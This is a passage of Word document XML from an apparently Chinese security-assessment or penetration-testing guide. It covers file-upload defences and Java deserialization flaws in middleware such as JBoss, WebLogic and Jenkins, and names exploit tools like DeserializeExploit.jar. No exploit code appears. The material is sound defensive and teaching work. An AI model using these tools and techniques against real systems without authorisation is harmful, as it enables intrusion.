        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而言，撤销其目录的</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'x'</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限；实际中很多大型网站的上传应用都会放置在独立的存储上作为静态文件处理，一是方便使用缓存加速降低能耗，二是杜绝了脚本执行的可能性；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6906C5BA" w14:textId="68E03223" w:rsidR="00F65808" w:rsidRPr="000D173B" w:rsidRDefault="002244BC" w:rsidP="000D173B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件类型检查：建议使用</w:t>
      </w:r>
      <w:r w:rsidR="00F65808" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>白名单方式，结合</w:t>
      </w:r>
      <w:r w:rsidR="00F65808" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MIME Type</w:t>
      </w:r>
      <w:r w:rsidR="00F65808" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、后缀检查等方式（即只允许允许的文件类型进行上传）；此外对于图片的处理可以使用压缩函数或</w:t>
      </w:r>
      <w:r w:rsidR="00F65808" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>resize</w:t>
      </w:r>
      <w:r w:rsidR="00F65808" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，处理图片的同时破坏其包含的</w:t>
      </w:r>
      <w:r w:rsidR="00F65808" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00F65808" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A293968" w14:textId="77777777" w:rsidR="002244BC" w:rsidRPr="000D173B" w:rsidRDefault="00F65808" w:rsidP="000D173B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用随机数改写文件名和文件路径，使得用户不能轻易访问自己上传的文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEB4C7" w14:textId="7ADCD3F8" w:rsidR="001A7A0B" w:rsidRDefault="000D173B" w:rsidP="000D173B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单独设置文件服务器的域名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543F39FE" w14:textId="3C27C66E" w:rsidR="00B44623" w:rsidRPr="000D173B" w:rsidRDefault="00B44623" w:rsidP="00B44623">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BB41B43" w14:textId="5F32CA9B" w:rsidR="009C1845" w:rsidRPr="00F757E4" w:rsidRDefault="009C1845" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc498434565"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="757DBE6A" w14:textId="0DB58698" w:rsidR="009C1845" w:rsidRPr="00F60514" w:rsidRDefault="009C1845" w:rsidP="00F60514">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列化就是把对象转换成字节流，便于保存在内存、文件、数据库中，</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ObjectOutputStream</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>writeObject()</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法可以实现序列化。</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化即逆过程，由字节流还原成对象。</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ObjectInputStream</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>readObject()</w:t>
      </w:r>
      <w:r w:rsidR="0023147C" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法用于反序列化。</w:t>
      </w:r>
      <w:r w:rsidR="00DC46FF" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache Commons Collections</w:t>
      </w:r>
      <w:r w:rsidR="00DC46FF" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许链式的任意的类函数反射调用。攻击者通过允许</w:t>
      </w:r>
      <w:r w:rsidR="00DC46FF" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="00DC46FF" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列化协议的端口，把攻击代码上传到服务器上，再由</w:t>
      </w:r>
      <w:r w:rsidR="00DC46FF" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache Commons Collections</w:t>
      </w:r>
      <w:r w:rsidR="00DC46FF" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的</w:t>
      </w:r>
      <w:r w:rsidR="00DC46FF" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TransformedMap</w:t>
      </w:r>
      <w:r w:rsidR="00DC46FF" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086DF6D8" w14:textId="77777777" w:rsidR="00C95A26" w:rsidRPr="00F60514" w:rsidRDefault="009C1845" w:rsidP="00F60514">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写的</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用与</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器间</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常会发送大量的序列化对象例，</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如以下场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA36261" w14:textId="77777777"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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求中的参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00022000" w14:textId="77777777"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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议，被广泛使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议完全基于序列化</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C923DBF" w14:textId="77777777"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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">JMX </w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样用于处理序列化对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219C604E" w14:textId="5A9B434E"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自定义协议</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来接收与发送原始的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145229F4" w14:textId="65F99F8B" w:rsidR="009C1845" w:rsidRPr="00F60514" w:rsidRDefault="00843D76" w:rsidP="00F60514">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见中间件，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JBoss</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebSphere</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>jenkins</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化漏洞，可利用工具进行测试，如</w:t>
      </w:r>
      <w:r w:rsidR="0020764B" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>DeserializeExploit.jar</w:t>
      </w:r>
      <w:r w:rsidR="0020764B" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="0020764B" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>WebLogic_EXP.jar</w:t>
      </w:r>
      <w:r w:rsidR="00AF1A5B" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00AF1A5B" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>attackRMI.jar</w:t>
      </w:r>
      <w:r w:rsidR="0020764B" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0300D11B" w14:textId="1500C13D" w:rsidR="009C1845" w:rsidRPr="00F60514" w:rsidRDefault="00C24790" w:rsidP="00F60514">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009C1845" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00C95A26" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC433D" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00AC433D" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化漏洞存在于各大业务系统中，影响范围大，且自动化利用工具比较成熟，攻击成本较低。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5162A098" w14:textId="77777777" w:rsidR="009C1845" w:rsidRPr="00F60514" w:rsidRDefault="009C1845" w:rsidP="00F60514">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB7D25E" w14:textId="16453F91" w:rsidR="009C1845" w:rsidRPr="00F60514" w:rsidRDefault="00A438F8" w:rsidP="00F60514">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
